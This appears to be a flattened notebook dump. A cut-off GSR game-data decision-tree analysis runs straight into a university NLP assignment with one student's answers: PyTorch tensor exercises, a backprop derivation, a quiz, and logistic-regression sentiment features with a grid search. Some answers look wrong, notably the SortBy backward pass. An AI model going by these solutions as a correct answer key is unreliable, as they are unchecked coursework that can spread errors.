end_pos = sum([1 for x in slope_end if x > 0]) end_nag = sum([1 for x in slope_end if x < 0]) dict_end = {1:end_pos, 2:end_nag} ax[2][0].set_title("Distribution of STD for End of game") ax[2][0].hist(std_end, bins=50, range=(min(std_end), max(std_end))) #ax[2][0].set_xlim([0,100]) ax[2][1].set_title("Distribution of Slope(+,-) for End of game") ax[2][1].bar(list(dict_end.keys()), dict_end.values(), color='g') ax[2][1].set_xticklabels(("","","Positive","","","", "Negative")) plt.show() return veryBeginning, duringGame, nearEnd test = [20, 50, 100, 150, 250] for t in test: gsr_analysis(t)We have collected 570 games. The size of GSR sample is 20.Decision Tree / SVM Modelbegin, during, end = gsr_analysis(20, False) dict_begin = {} label_begin = [] var_begin = [] max_begin = [] min_begin = [] first_quartile_begin = [] third_quartile_begin = [] average_begin = [] median_begin = [] for b in begin: label_begin.append(int(0)) var_begin.append(np.var(b)) max_begin.append(np.max(b)) min_begin.append(np.min(b)) first_quartile_begin.append(np.percentile(b, 25)) third_quartile_begin.append(np.percentile(b, 75)) average_begin.append(np.average(b)) median_begin.append(np.median(b)) dict_begin["label"] = label_begin dict_begin["variance"] = var_begin dict_begin["max"] = max_begin dict_begin["min"] = min_begin dict_begin["first_quartile"] = first_quartile_begin dict_begin["third_quartile"] = third_quartile_begin dict_begin["average"] = average_begin dict_begin["median"] = median_begin f1 = pd.DataFrame(dict_begin) print(f1.info()) dict_during = {} label_during = [] var_during = [] max_during = [] min_during = [] first_quartile_during = [] third_quartile_during = [] average_during = [] median_during = [] for b in during: label_during.append(int(1)) var_during.append(np.var(b)) max_during.append(np.max(b)) min_during.append(np.min(b)) first_quartile_during.append(np.percentile(b, 25)) third_quartile_during.append(np.percentile(b, 75)) average_during.append(np.average(b)) median_during.append(np.median(b)) dict_during["label"] = label_during dict_during["variance"] = var_during dict_during["max"] = max_during dict_during["min"] = min_during dict_during["first_quartile"] = first_quartile_during dict_during["third_quartile"] = third_quartile_during dict_during["average"] = average_during dict_during["median"] = median_during f2 = pd.DataFrame(dict_during) print(f2.info()) dict_end = {} label_end = [] var_end = [] max_end = [] min_end = [] first_quartile_end = [] third_quartile_end = [] average_end = [] median_end = [] for b in end: label_end.append(int(2)) var_end.append(np.var(b)) max_end.append(np.max(b)) min_end.append(np.min(b)) first_quartile_end.append(np.percentile(b, 25)) third_quartile_end.append(np.percentile(b, 75)) average_end.append(np.average(b)) median_end.append(np.median(b)) dict_end["label"] = label_end dict_end["variance"] = var_end dict_end["max"] = max_end dict_end["min"] = min_end dict_end["first_quartile"] = first_quartile_end dict_end["third_quartile"] = third_quartile_end dict_end["average"] = average_end dict_end["median"] = median_end f3 = pd.DataFrame(dict_end) final_data = pd.concat([f1,f2,f3], ignore_index=True) epochs = 10 for i in range(epochs): final_data = final_data.sample(frac=1) train, test = train_test_split(final_data, test_size = 0.2) y = train["label"] X = train.drop("label", axis=1) #X = train[['average', 'max', 'median', 'min','variance']] tree_clf = DecisionTreeClassifier(random_state=0, max_depth=5) tree_clf.fit(X, y) print("the score for each epoch: {}".format(tree_clf.score(X,y))) print(X.columns) tree_clf.feature_importances_ export_graphviz( tree_clf, out_file= "bird_tree.dot", feature_names=X.columns, class_names=["begin","during","end"], rounded=True, filled=True ) from subprocess import check_call check_call(['dot','-Tpng','bird_tree.dot','-o','bird_tree.png']) y_test = test["label"] X_test = test.drop("label", axis=1) tree_clf.score(X_test, y_test)Assignment 1The first assignment has two parts. The first part concerns PyTorch and the second part is about feature engineering for a basic NLP task. Instructions1. Make a copy of this notebook - Click on "File -> Save a copy in Drive" and open it in Colab afterwards - Alternatively, download the notebook and work on it on your local machine. However, keep in mind that you will have to make sure it still runs on Colab afterwards and does not depend on any packages that you installed locally2. Rename your notebook to **surname_forename_studentnumber.ipynb** - Make sure to exactly follow this naming scheme (don't replace `_` with `-` or something like that) - **Failure to comply with this scheme results in -10 points!**3. For math exercises, use $\LaTeX$ to typset your answer4. For coding exercises, insert your code at ` TODO` statements5. For multiple-choice questions, choose an answer from the drop-down list6. Before submitting your notebook, **make sure that it runs without errors when executed from start to end on Colab** - To check this, reload your notebook and the Python kernel, and run the notebook from the first to the last cell - **If your notebook throws any errors, you will be penalized by -25 points in addition to any penalities from incorrect answers** - We are not going to fix any errors (no matter how small) to make your code work7. Download your notebook and submit it on Moodle - Click on "File -> Download .ipynb" Notebook Setup [don't change!]%%shell pip install torch import torch from torch import nn torch.__version__Part I: PyTorch [50 points] Linear Algebra [30 points] PyTorch Tensors [5 points] Construct Scaled Identity Matrix [1 point]Given $n \in \mathbb{N}$ and $c \in \mathbb{R}$, construct a matrix $\mathbf{X} \in \mathbb{R}^{n\ \times\ n}$ where $\mathbf{X}$ has $c$ on its diagonal and zeros everywhere else.def construct_scaled_identity(n, c): a = torch.zeros((n, n)) # np.fill_diagonal(a, c) torch.diagonal(a).fill_(c) return a construct_scaled_identity(4, 3.2)Mean Diagonal [1 point]Given a square matrix $\mathbf{X}\in\mathbb{R}^{n\ \times\ n}$, return the mean of its diagonal.def mean_diagonal(x): a = torch.mean(torch.diagonal(x)) return a x = torch.arange(0, 16, dtype=torch.float).view(4, 4) mean_diagonal(x)Indexing [1 point]Given a matrix $\mathbf{X}\in\mathbb{R}^{n\ \times\ m}$ and $i,j \in \mathbb{N}$, return the submatrix $\mathbf{Y}\in\mathbb{R}^{i\ \times\ j}$ of the last i rows and last j columns of $\mathbf{X}$ (i.e. the bottom right submatrix of the given size). You can assume that $i \leq n$ and $j \leq m$.def bottom_right_matrix(x, i, j): a = x[-i:, -j:] return a x = torch.arange(0, 12).view(3, 4) bottom_right_matrix(x, 2, 2)Transpose Sum [2 points]Given a tensor $\mathcal{X}\in\mathbb{R}^{i\ \times\ j\ \times\ k}$, return a transposed tensor $\mathcal{y}\in\mathbb{R}^{j\ \times\ i}$ whose values in the third dimension are summed up.def transpose_sum(x): a = torch.sum(x, dim=2) a = torch.transpose(a, 0, 1) return a x = torch.arange(0, 12).view(2, 3, 2) transpose_sum(x)Matrix-vector Multiplication [10 points] Implement five unique ways for multiplying a matrix A with a vector b. **Each PyTorch function is allowed to be used in only one of the five implementations**. For instance, if you use `unsqueeze` in one of the methods, you are not allowed to use it for the other five implementations. Furthermore, functions in `torch` and in `torch.Tensor` are treated as the same function (i.e. using `torch.add(x, y)`, `x.add(y)` and `x + y` are all treated as the same function and hence are not allowed to be used in more than one implementation). Your code needs to be applicable to any matrix $A \in \mathbb{R}^{n\ \times\ m }$ and vector $b\in\mathbb{R}^m$.def matrixvector1(A, b): return torch.matmul(A, b) def matrixvector2(A, b): return A @ b def matrixvector3(A, b): return A.mm(b.unsqueeze(1)).squeeze(-1) def matrixvector4(A, b): return torch.einsum('ij,j->i', A, b) def matrixvector5(A, b): return torch.mv(A, b)Backprop [15 points] Forward [2 points]Implement $\mathbf{y}\odot\text{tanh}\left(\mathbf{W}\mathbf{x}+\mathbf{b}\right)$ in PyTorch without using a linear layer implementation (i.e. do the matrix-vector mulitplication and addition of a bias term yourself). Note that we are not looking for a batched implementation, so assume $\mathbf{y},\mathbf{b} \in \mathbb{R}^n, \mathbf{x}\in\mathbb{R}^m$ and $\mathbf{W}\in\mathbb{R}^{n\ \times\ m}$def fw(y, W, x, b): result = y * torch.tanh(torch.matmul(W, x) + b) return resultGradient [10 points]Derive $\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}}\left[\mathbf{y}\odot\text{tanh}\left(\mathbf{W}\mathbf{x}+\mathbf{b}\right)\right]$ analytically. Here $\mathbf{z}$ is an _upstream (error) gradient_ and we are interested in calculating the _downstream gradient_ for $\mathbf{x}$. Make sure to write down all intermediate steps and not just the final result. Let's define:\begin{equation}h = \text{tanh}(z)\\z = Wx + b\end{equation}We can therefore write:\begin{align}\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}}\left[\mathbf{y}\odot\text{tanh}\left(\mathbf{W}\mathbf{x}+\mathbf{b}\right)\right] &=\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}} [\mathbf{y}\odot{h}]\end{align}Also, by using the chain rule:\begin{equation}\frac{\partial}{\partial \mathbf{x}} = \frac{\partial}{\partial h}\frac{\partial h}{\partial z}\frac{\partial z}{\partial \mathbf{x}}\end{equation}And, deriving the product:\begin{equation}\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}} [\mathbf{y}\odot{h}] = \mathbf{z}^\top \mathbf{y} \frac{\partial} {\partial \mathbf{x}} \odot{h} + {h} \odot \frac{\partial} {\partial \mathbf{x}} \mathbf{y}\end{equation}We can remove the second portion since:\begin{equation}\frac{\partial} {\partial \mathbf{x}} \mathbf{y} = 0\end{equation}So finally:\begin{equation}\\\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}} [\mathbf{y}\odot{h}] = \mathbf{z}^\top\frac{\partial}{\partial h}\frac{\partial h}{\partial z}\frac{\partial z}{\partial \mathbf{x}} [\mathbf{y}\odot{h}]\\\mathbf{z}^\top\frac{\partial}{\partial h}\frac{\partial h}{\partial z}\frac{\partial z}{\partial \mathbf{x}} [\mathbf{y}\odot{h}] = \mathbf{z}^\top diag(\mathbf{y}\odot\frac{\partial h}{\partial z}\frac{\partial z}{\partial \mathbf{x}}[h])\\\mathbf{z}^\top diag(\mathbf{y}\odot\frac{\partial h}{\partial z}\frac{\partial z}{\partial \mathbf{x}}[\text{tanh}(z)] = \mathbf{z}^\top diag(\mathbf{y}\odot(1 - \text{tanh}(z)^2))\frac{\partial z}{\partial \mathbf{x}}[z]\\\mathbf{z}^\top diag(\mathbf{y}\odot(1 - \text{tanh}(z)^2))\frac{\partial z}{\partial \mathbf{x}}[z] = \mathbf{z}^\top diag(\mathbf{y}\odot(1 - \text{tanh}(z)^2))W\end{equation}Where:\begin{equation}\frac{\partial}{\partial h} = diag(\mathbf{y})\\\frac{\partial h}{\partial z} = 1 - tanh(z)^2\\\frac{\partial z}{\partial \mathbf{x}} = W\end{equation}The first derivative is defined as such by using a property of the Hadamard product where:\begin{equation}\mathbf{A}\odot\mathbf{X} = diag(\mathbf{A})\mathbf{X}\end{equation} Backward [3 points]Implement the calculation for $\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}}\left[\mathbf{y}\odot\text{tanh}\left(\mathbf{W}\mathbf{x}+\mathbf{b}\right)\right]$ in PyTorch (i.e. without using PyTorch Autograd's `.backward`) using your derivation above.def bw(y, W, x, b, grad_output): result = torch.diag(y * (1 - torch.tanh(torch.matmul(W, x) + b)**2)) result = grad_output.T.matmul(result.matmul(W)) return resultSortBy PyTorch Autograd Function [10 points] Implement a PyTorch Autograd function `SortBy` which takes two inputs:- `x` is a matrix of size `m x n` - `s` is an accompanying vector of size `m``SortBy` should sort the position of the row vectors in `x` using the accompanying scores in `s` in ascending order. For example, given$$\begin{align}\mathbf{X} &= \left[\begin{matrix}0.2 & -0.4 & 0.3\\1.2 & 2.3 & -2.1\\0.1 & -0.1 & 2\end{matrix}\right]&\mathbf{s} &=\left[\begin{matrix}0.2\\-0.1\\3\end{matrix}\right]\end{align}$$ the forward pass of `SortBy` should return$$\mathbf{Y} = \left[\begin{matrix}1.2 & 2.3 & -2.1\\0.2 & -0.4 & 0.3\\0.1 & -0.1 & 2\end{matrix}\right]$$.Furthermore, given an upstream gradient `grad_output` (i.e. a matrix of the same size as X), the backward pass of `SortBy` should calculate the gradient of `x`, effectively rerouting the gradient to the original position of the vectors before sorting. For example, if the first row vector of the upstream gradient in our example above is a vector $\mathbf{z}$, the gradient of `x` would have $\mathbf{z}$ as its second row vector.Note that, `SortBy` will only be differentiable w.r.t. to x, and is not be differentiable w.r.t. the sorting procedure to provie a gradient for `s`. **You are not allowed to use any Python loops in your implementation. If you use Python loops for your solution, we will only give you half of the points!**Hints:- You are allowed to use `torch.sort` in your implementation of the forward pass.- Similarly to the example we had in the lecture, you can use the context `ctx` to save tensors on the forward pass that you might need to reuse on the backward pass.from torch.autograd import Function class SortBy(Function): @staticmethod def forward(ctx, x, s): result = x[s.sort().indices] ctx.save_for_backward(result, s) return result @staticmethod def backward(ctx, grad_output): result, s = ctx.saved_tensors return grad_output[s.sort().indices], NoneMultiple Choice Quiz [10 points]Answer the following questions by selecting the correct most specific answer (or `None` in case all answers are wrong).1. Which of the following operations cannot be calculated using `@`?2. What is gradient checking for?3. Why don't we use the finite differences method of gradient checking to calculate gradients instead of using backpropagation?4. Which of the following operations cannot be expressed as a single einsum string?5. When should you prefer using `view` instead of `reshape`?6. Which of the following statements is true if you construct a PyTorch tensor from a NumPy array using `torch.from_numpy`?7. Which one is a sufficient condition for being able to broadcast an operation between two tensors?8. What is the difference between a torch.Tensor and a torch.nn.Parameter?9. Given a convex loss function and a sufficiently small learning rate, stochastic gradient descent is guaranteed to?10. Given a non-convex loss function and a very large learning rate, stochastic gradient descent is guaranteed to?#@title Answers { run: "auto" } Q1 = "None of the above" #@param ["Matrix-matrix multiplication", "Matrix-vector multiplication", "Vector-vector multiplication", "Tensor-matrix multiplication", "Tensor-vector multiplication", "None of the above"] Q2 = "It tests whether the forward pass of a function is consistent with the backward pass" #@param ["It tests whether the forward pass of a function is consistent with the backward pass", "It is used at runtime to check for numerical instabilities in the backward pass", "It tests wether the function and its gradient have been implemented correctly", "It tests whether the norm of the gradients of a function are bounded", "None of the above"] Q3 = "It would be too slow" #@param ["It cannot be used to approximate the gradient accurately enough", "It can only be used to calculate the gradient of single functions and not for chained functions which are commonly used in deep learning models", "It would be too slow", "None of the above"] Q4 = "None of the above" #@param ["The transpose of an order-three tensor", "The sum of the diagonal of a square matrix", "The outer product of two matrices", "None of the above"] Q5 = "When the tensor is contiguous" #@param ["When the tensor is non-contiguous", "When the tensor is contiguous", "None of the above"] Q6 = "They point to the same memory and altering one will change the other" #@param ["Gradients can be calculated using both, the PyTorch tensor and the NumPy array", "They point to the same memory and altering one will change the other", "The PyTorch tensor cannot be mapped back to a NumPy array", "None of the above"] Q7 = "One of the two tensors is a scalar" #@param ["One of the two tensors is a scalar", "One of the tensors has a singleton dimension", "The two tensors have the same number of dimensions", "None of the above"] Q8 = "Parameters get associated with a model when assigned to a member of the model's modules" #@param ["Parameters are mutable and tensors are not", "Parameters get associated with a model when assigned to a member of the model's modules", "Parameters need to be flattened into vectors whereas tensors can be high-dimensional", "None of the above"] Q9 = "All of the above" #@param ["Find a local optimum", "Find the global optimum", "All of the above", "None of the above"] Q10 = "None of the above" #@param ["Find a local optimum", "Find the global optimum", "Converge to a saddle point", "All of the above", "None of the above"]Part II: Feature Engineering [50 points]In this section you will develop a logistic regression model for sentiment prediction. Setup First we download the [sentence polarity dataset v1.0](http://www.cs.cornell.edu/people/pabo/movie-review-data/rt-polaritydata.tar.gz) from this [website](http://www.cs.cornell.edu/people/pabo/movie-review-data/) using a few shell commands.%%shell wget http://www.cs.cornell.edu/People/pabo/movie-review-data/rt-polaritydata.tar.gz tar -xzf rt-polaritydata.tar.gz mv rt-polaritydata.README.1.0.txt rt-polaritydata cd rt-polaritydata iconv -f cp1252 -t utf-8 < rt-polarity.neg > rt-polarity.neg.utf8 iconv -f cp1252 -t utf-8 < rt-polarity.pos > rt-polarity.pos.utf8 perl -ne 'print "neg\t" . $_' < rt-polarity.neg.utf8 > rt-polarity.neg.utf8.tsv perl -ne 'print "pos\t" . $_' < rt-polarity.pos.utf8 > rt-polarity.pos.utf8.tsv cat rt-polarity.neg.utf8.tsv rt-polarity.pos.utf8.tsv > rt-polarity.utf8.tsv--2021-01-31 21:25:20-- http://www.cs.cornell.edu/People/pabo/movie-review-data/rt-polaritydata.tar.gz Resolving www.cs.cornell.edu (www.cs.cornell.edu)... 172.16.31.10 Connecting to www.cs.cornell.edu (www.cs.cornell.edu)|172.16.31.10|:80... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: http://www.cs.cornell.edu/people/pabo/movie-review-data/rt-polaritydata.tar.gz [following] --2021-01-31 21:25:20-- http://www.cs.cornell.edu/people/pabo/movie-review-data/rt-polaritydata.tar.gz Reusing existing connection to www.cs.cornell.edu:80. HTTP request sent, awaiting response... 200 OK Length: 487770 (476K) [application/x-gzip] Saving to: ‘rt-polaritydata.tar.gz.5’ rt-polaritydata.tar 100%[===================>] 476.34K 2.47MB/s in 0.2s 2021-01-31 21:25:20 (2.47 MB/s) - ‘rt-polaritydata.tar.gz.5’ saved [487770/487770]Now we install [AllenNLP](https://allennlp.org/).%%shell pip install allennlp==0.9Requirement already satisfied: allennlp==0.9 in /usr/local/lib/python3.6/dist-packages (0.9.0) Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (1.4.1) Requirement already satisfied: tqdm>=4.19 in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (4.41.1) Requirement already satisfied: scikit-learn in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (0.22.2.post1) Requirement already satisfied: conllu==1.3.1 in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (1.3.1) Requirement already satisfied: requests>=2.18 in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (2.23.0) Requirement already satisfied: boto3 in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (1.16.63) Requirement already satisfied: gevent>=1.3.6 in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (21.1.2) Requirement already satisfied: pytest in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9)[...]Next we implement a AllenNLP data loader for this data.from typing import Iterator, List, Dict, Optional import torch import torch.optim as optim import numpy as np from allennlp.data import Instance from allennlp.data.fields import TextField, SequenceLabelField, LabelField from allennlp.data.dataset_readers import DatasetReader from allennlp.common.file_utils import cached_path from allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer from allennlp.data.tokenizers import Token from allennlp.data.vocabulary import Vocabulary from allennlp.models import Model from allennlp.modules.text_field_embedders import TextFieldEmbedder, BasicTextFieldEmbedder from allennlp.modules.token_embedders import Embedding from allennlp.modules.seq2seq_encoders import Seq2SeqEncoder, PytorchSeq2SeqWrapper from allennlp.nn.util import get_text_field_mask, sequence_cross_entropy_with_logits from allennlp.training.metrics import CategoricalAccuracy from allennlp.data.iterators import BucketIterator from allennlp.training.trainer import Trainer from allennlp.predictors import SentenceTaggerPredictor class PolarityDatasetReader(DatasetReader): """ DatasetReader for polarity data like neg\tI had better gone to Imperial """ def __init__(self, token_indexers: Dict[str, TokenIndexer] = None, tokenize_and_preprocess = lambda text: text.split(" ")) -> None: super().__init__(lazy=False) self.token_indexers = token_indexers or {"tokens": SingleIdTokenIndexer()} self.tokenize_and_preprocess = tokenize_and_preprocess def text_to_instance(self, tokens: List[Token], label: Optional[str] = None) -> Instance: sentence_field = TextField(tokens, self.token_indexers) fields = {"sentence": sentence_field} if label: label_field = LabelField(label=label) fields["label"] = label_field return Instance(fields) def _tokenize_and_preprocess(text): return text.split(" ") def _read(self, file_path: str) -> Iterator[Instance]: with open(file_path) as f: for line in f: label, text = line.split("\t") tokens = [Token(word) for word in self.tokenize_and_preprocess(text)] yield self.text_to_instance(tokens, label)Preprocessing [7pts]In order to fit our model, we will need to tokenize and preprocess the data. Write a dataset loader that preprocesses the data.Tokenization is an important field of NLP, and can make a large difference to downstream performance. Luckily fo us, the dataset has already been tokenized, so we just need to split the input text by whitespace to get the tokens. The tokenization is not perfect though. Your preprocessing function should should fix all instances where "Mr." have been tokenized as two tokens to instances where "Mr." is a single token.Implement the above by changing and possibly extending the code below.def collapse_mr_dot(text): """ Args: tokens: a list of tokens """ result = [] text = text.lower() text = text.replace("mr .", "mr.") text = text.replace("mr .", "mr.") result = text.split(" ") return result torch.manual_seed(1) reader = PolarityDatasetReader(tokenize_and_preprocess=collapse_mr_dot) data_pre = reader.read(cached_path("rt-polaritydata/rt-polarity.utf8.tsv")) rt_polarity_pre = data_pre for instance in data_pre: if "mr." in [t.text for t in instance['sentence']]: print(instance['sentence'][:]) break10662it [00:00, 10675.45it/s]Logistic RegressionBelow we provide a simple implementation of a model, that combined with the corresponding loss, amounts to logistic regression.import torch import torch.nn as nn # Model class LogisticRegression(nn.Module): """ Simple Logistic Regression implementation based on torchtext input format. """ def __init__(self, num_features): super(LogisticRegression, self).__init__() self.weights = nn.Parameter(torch.normal(torch.zeros(num_features)), requires_grad=True) def forward(self, sentence): """ Args: sentence: a dictionary of ... """ tokens = sentence['tokens'] active_tokens_mask = get_text_field_mask(sentence) # retrieve weights and set those to zero that come from padding cells filtered = active_tokens_mask * self.weights[tokens] # sum pooling along the token position dimension logits = filtered.sum(dim=1) return logits # model = LogisticRegression(vocab.get_vocab_size("tokens")) # model.forward(sentence)Formulation [5pts]In the class we have presented the model as encoder $f(\mathbf{x})$ follwed by a linear decoder$$s(\mathbf{x}) = \boldsymbol{\theta}^T f(\mathbf{x}) = \boldsymbol{\theta}^T \sum_{w\in \mathbf{x}} f(w) $$ where $f(\mathbf{x})$ is the representation of the input text. The implementation here achieves the same output, but the calculation is performed slightly differently due to technical reasons when working with pytorch. Can you give a mathematical description of this implementation here that captures the order in which computation happens? Below $f(w)$ is a one-hot representation of a word, as per lecture 2. The candidate answers are:1. $s(\mathbf{x}) = \left[\sum_{w\in \mathbf{x}} f(w) \right]^T \boldsymbol{\theta} $2. $s(\mathbf{x}) = \sum_{w\in \mathbf{x}} \boldsymbol{\theta}^T f(w)$3. $s(\mathbf{x}) = \frac{1}{|\mathbf{x}|}\boldsymbol{\theta}^T \sum_{\mathbf{x}\in x} f(w)$4. $s(\mathbf{x}) = \left[\sum_{w\in \mathbf{x}} f(w) \right]^T \boldsymbol{\theta} \frac{1}{|\mathbf{x}|} $#@title Answers { run: "auto" } QFormulation = "Eq 1" #@param ["Eq 1", "Eq 2", "Eq 3", "Eq 4", "None of the above"]Mean Pooling [8pts]Create a new version of the logistic regression module, using mean pooling.# Model class LogisticRegressionMeanPooling(nn.Module): """ Simple Logistic Regression implementation based on torchtext input format. """ def __init__(self, num_features): super(LogisticRegressionMeanPooling, self).__init__() self.weights = nn.Parameter(torch.normal(torch.zeros(num_features)), requires_grad=True) def forward(self, sentence): """ Args: sentence: a dictionary of ... """ tokens = sentence['tokens'] active_tokens_mask = get_text_field_mask(sentence) # retrieve weights and set those to zero that come from padding cells filtered = active_tokens_mask * self.weights[tokens] # sum pooling along the token position dimension logits = filtered.sum(dim=1) # Get the number of words for each sentence n = active_tokens_mask.sum(dim=1) # Divide by the number of words mean_logits = logits/n return mean_logitsAdd Features [20pts]Add the features below to the preprocessing pipeline shown below. Bias Feature [6 pts]It is common practice to add a *bias* term of linear classifiers:$$s(\mathbf{x}) = \boldsymbol{\theta}^T f(\mathbf{x}) + b $$One way to achieve this in general is to augment $f(\mathbf{x}) $ with an extra component that is always set to $1$. In our implementation, this can be achieved by augmenting the sentence field appropriately when loading the data, and setting the `add_features` argument in the dataset loader. Implement this below. Bigram Feature [7 pts]Use the `add_features` pipeline to implement a feature that captures whether word *pairs* $w_1, w_2$ appear consecutively in the sentence. This feature should be *combined* with the standard unigram and bias features. Max Pooling [7 pts]Use the `add_features` pipeline to implement max pooling such that any feature appearing more than once in the sentence is only counted once, as per the lecture slides of week 1.def add_features(text): """ Args: features: a list of tokens """ # TODO implement this function based on instructions above. toks = collapse_mr_dot(text) # Bias Feature toks.append('--ciao--') # Biagram # I am doing this after the bias as the question is asking for it. sentence_len = len(toks) for i in range(sentence_len - 1): toks.append(toks[i] + ' ' + toks[i + 1]) # Max Pooling unique_toks = list(dict.fromkeys(toks)) result = list(unique_toks) return result reader = PolarityDatasetReader(tokenize_and_preprocess=add_features) data_pre_2 = reader.read(cached_path("rt-polaritydata/rt-polarity.utf8.tsv")) data_pre_2[10]['sentence'][:]10662it [00:01, 7681.21it/s]Hyperparameters Search and Analysis [10 pts] Early Stopping [5pts]Finding the right number of iterations is important (why can running to convergence be bad?). One way to to do this is to iterate for a max number K, and then choose the iteration with the largest dev set performance. But this can be slow and unnecessary if we assume that dev-set performance doesn't go up again once it starts to go down (dev set performance concave). Implement a variant of the training loop that implements this idea. Specifically, the loop should terminate if there has been no increase in development set accuracy when comparing the current accuracy to that from 10 epochs ago. Grid Search [5pts]Using all the features you developed in the above "Add Features" section (or the base model in case you could not address the question), find the best combination of * Learning Rate in {1.0, 0.1}* Number of Training epochs (via early stopping, use 1000 as maximum)* L2 regularisation weight in {0.001, 0.0001, 0}After grid search, the value of the variables `best_acc`, `best_l2`, `best_lr` and `best_epochs` should be appropriately.def accuracy(dataset, model, iterator): # Testing the model and returning the accuracy on the given dataset total = 0 correct = 0 for batch in iterator(dataset, num_epochs=1): sentence = batch['sentence'] label = batch['label'] output = model(sentence) total += len(label) prediction = (output > 0).long() correct += (prediction == label).sum() return float(correct) / total def training_loop(model, iterator, train_set, dev_set, num_epochs=100, lr=0.1, weight_decay=0.0, early_stop_decision = 'simple'): """ Should return the best dev_set accuracy and the number of epochs used. """ criterion = torch.nn.BCEWithLogitsLoss() optimizer = torch.optim.SGD(model.parameters(), lr=lr, weight_decay=weight_decay) # Training the Model epoch_accuracies = [] best_epoch = 0 best_accuracy = 0.0 for epoch in range(num_epochs): for i, batch in enumerate(iterator(train_set,num_epochs=1)): sentence = batch['sentence'] label = batch['label'].float() # Forward + Backward + Optimize optimizer.zero_grad() logits = model(sentence) loss = criterion(logits, label) loss.backward() optimizer.step() if (i+1) % 100 == 0: print ('Epoch: [%d/%d], Step: [%d/%d], Loss: %.4f, Dev: %.4f' % (epoch+1, num_epochs, i+1, len(train_set)//iterator._batch_size, loss.data, accuracy(dev_set, model, iterator))) epoch_accuracies.append(accuracy(dev_set, model, iterator)) if epoch_accuracies[-1] > best_accuracy: best_accuracy = epoch_accuracies[-1] best_epoch = epoch # TODO: implement early stopping here # The exercise require the early stopping to happen if the comparison with the epoch accuracy has not gone up in th elast 10 iterations. # We can compare this with the 10th last result or we can use a moving average to ensure the smoothness of the function. # I added an argument "early_stop_decision" in training_loop with a default to simple to check for this # I use best set accuracy as specified here: https://moodle.ucl.ac.uk/mod/forum/discuss.php?d=539287 if early_stop_decision == 'simple': if len(epoch_accuracies) > 10: if best_accuracy <= epoch_accuracies[-11]: print("Early Stop") break elif early_stop_decision == 'complex': if len(epoch_accuracies) > 10: if best_accuracy <= sum(epoch_accuracies[-11:-2])/10: print("Early Stop") break return best_accuracy, best_epoch reader = PolarityDatasetReader(tokenize_and_preprocess=add_features) data = reader.read(cached_path("rt-polaritydata/rt-polarity.utf8.tsv")) training_data = data[0:-1000] dev_data = data[-1000:] vocab = Vocabulary.from_instances(training_data) iterator = BucketIterator(batch_size=32, sorting_keys=[("sentence", "num_tokens")]) iterator.index_with(vocab) print(len(training_data)) print(len(dev_data)) print(len(data)) best_acc = 0.0 # best accuracy achieved best_lr = 0.0 # best learning rate at best accuracy best_l2 = 0.0 # best l2 regularizing weight best_epochs = 0 # best number of epochs # TODO: implement grid search to make sure the above 4 variable have for lr in [1.0, 0.1]: for l2 in [0.001, 0.0001, 0]: for early_stop_decision in ["simple"]: model = LogisticRegression(num_features=vocab.get_vocab_size("tokens")) acc, epochs = training_loop(model, iterator, training_data, dev_data, lr=lr, weight_decay = l2, early_stop_decision = early_stop_decision) if acc > best_acc: print(epochs) best_acc = acc best_lr = lr best_l2 = l2 best_epochs = epochs best_early_stop_decision = early_stop_decision print("Best Accuracy working with LogisticRegression and simple early stop:") best_acc, best_epochs, best_lr, best_l2, best_early_stop_decision best_acc = 0.0 # best accuracy achieved best_lr = 0.0 # best learning rate at best accuracy best_l2 = 0.0 # best l2 regularizing weight best_epochs = 0 # best number of epochs # TODO: implement grid search to make sure the above 4 variable have for lr in [1.0, 0.1]: for l2 in [0.001, 0.0001, 0]: for early_stop_decision in ["complex"]: model = LogisticRegression(num_features=vocab.get_vocab_size("tokens")) acc, epochs = training_loop(model, iterator, training_data, dev_data, lr=lr, weight_decay = l2, early_stop_decision = early_stop_decision) if acc > best_acc: print(epochs) best_acc = acc best_lr = lr best_l2 = l2 best_epochs = epochs best_early_stop_decision = early_stop_decision print("Best Accuracy working with LogisticRegression and complex early stop:") best_acc, best_epochs, best_lr, best_l2, best_early_stop_decision best_acc = 0.0 # best accuracy achieved best_lr = 0.0 # best learning rate at best accuracy best_l2 = 0.0 # best l2 regularizing weight best_epochs = 0 # best number of epochs # TODO: implement grid search to make sure the above 4 variable have for lr in [1.0, 0.1]: for l2 in [0.001, 0.0001, 0]: for early_stop_decision in ["simple"]: model = LogisticRegressionMeanPooling(num_features=vocab.get_vocab_size("tokens")) acc, epochs = training_loop(model, iterator, training_data, dev_data, lr=lr, weight_decay = l2, early_stop_decision = early_stop_decision) if acc > best_acc: print(epochs) best_acc = acc best_lr = lr best_l2 = l2 best_epochs = epochs best_early_stop_decision = early_stop_decision print("Best Accuracy working with LogisticRegressionMeanPooling and simple early stop:") best_acc, best_epochs, best_lr, best_l2, best_early_stop_decision best_acc = 0.0 # best accuracy achieved best_lr = 0.0 # best learning rate at best accuracy best_l2 = 0.0 # best l2 regularizing weight best_epochs = 0 # best number of epochs # TODO: implement grid search to make sure the above 4 variable have for lr in [1.0, 0.1]: for l2 in [0.001, 0.0001, 0]: for early_stop_decision in ["complex"]: model = LogisticRegressionMeanPooling(num_features=vocab.get_vocab_size("tokens")) acc, epochs = training_loop(model, iterator, training_data, dev_data, lr=lr, weight_decay = l2, early_stop_decision = early_stop_decision) if acc > best_acc: print(epochs) best_acc = acc best_lr = lr best_l2 = l2 best_epochs = epochs best_early_stop_decision = early_stop_decision print("Best Accuracy working with LogisticRegressionMeanPooling and complex early stop:") best_acc, best_epochs, best_lr, best_l2, best_early_stop_decisionBest Accuracy working with LogisticRegressionMeanPooling and complex early stop:Evaluation Validity CheckThis is a way for you to check whether you accidentially renamed answer variables or functions that we will use for automatic evaluation. Note that this is 